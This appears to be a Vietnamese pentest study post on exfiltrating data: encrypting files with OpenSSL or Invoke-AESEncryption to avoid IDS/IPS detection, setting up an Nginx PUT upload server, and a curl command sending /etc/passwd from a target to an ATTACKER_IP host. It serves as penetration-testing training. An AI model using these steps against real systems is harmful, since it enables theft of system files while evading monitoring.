Post

Protected File Transfers

Posted
By Mr.Kevin
views 1 min read
Protected File Transfers

Khi exfiltrate dữ liệu nhạy cảm, cần mã hóa file trước khi truyền để tránh bị phát hiện bởi IDS/IPS và tránh lộ dữ liệu nếu traffic bị intercept.

Linux — OpenSSL

1
2
3
4
5

# Encrypt
openssl enc -aes256 -iter 100000 -pbkdf2 -in <file> -out <file>.enc

# Decrypt
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in <file>.enc -out <file>
FlagÝ nghĩa
-aes256AES-256-CBC
-iter 100000Tăng vòng lặp KDF → chống brute-force
-pbkdf2Dùng PBKDF2 thay MD5 mặc định

Windows — Invoke-AESEncryption.ps1

1
2
3
4
5
6
7
8

# Import module
Import-Module .\Invoke-AESEncryption.ps1

# Encrypt file → tạo ra <file>.aes
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt

# Decrypt
Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\scan-results.txt.aes

Best Practice:

  • Dùng password khác nhau cho từng client/engagement
  • Ưu tiên kênh truyền đã mã hóa sẵn: SSH, SFTP, HTTPS
  • Mã hóa file là fallback khi không có kênh an toàn

HTTP/S — Nginx Upload Server (PUT Method)

Tại sao dùng Nginx thay Apache?

Apache dễ bị lợi dụng execute webshell (PHP module). Nginx không execute PHP theo mặc định → an toàn hơn khi setup upload server.

Setup

1
2
3
4
5
6
7
8

# 1. Tạo thư mục nhận file
sudo mkdir -p /var/www/uploads/SecretUploadDirectory

# 2. Đổi owner
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory

# 3. Tạo config
sudo nano /etc/nginx/sites-available/upload.conf

1
2
3
4
5
6
7

server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root    /var/www/uploads;
        dav_methods PUT;
    }
}

1
2
3
4
5
6
7

# 4. Enable + restart
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo rm /etc/nginx/sites-enabled/default   # nếu port 80 conflict
sudo systemctl restart nginx.service

# Debug
tail -2 /var/log/nginx/error.log

Upload file (từ target)

1
2
3
4

curl -T /etc/passwd http://<ATTACKER_IP>:9001/SecretUploadDirectory/users.txt

# Verify
tail -1 /var/www/uploads/SecretUploadDirectory/users.txt

Nginx không bật directory listing theo mặc định → file upload không bị lộ qua browser (khác Apache).

Tổng hợp chiến lược

Tình huốngPhương pháp
Linux exfil, cần mã hóaopenssl enc -aes256
Windows exfil, cần mã hóaInvoke-AESEncryption.ps1
Nhận file từ nhiều targetNginx PUT server
Cần stealth + encrypted channelSSH/SCP, HTTPS uploadserver
Pentest, File Transfer
file-transfer encryption openssl aes nginx https opsec
This post is licensed under CC BY 4.0 by the author.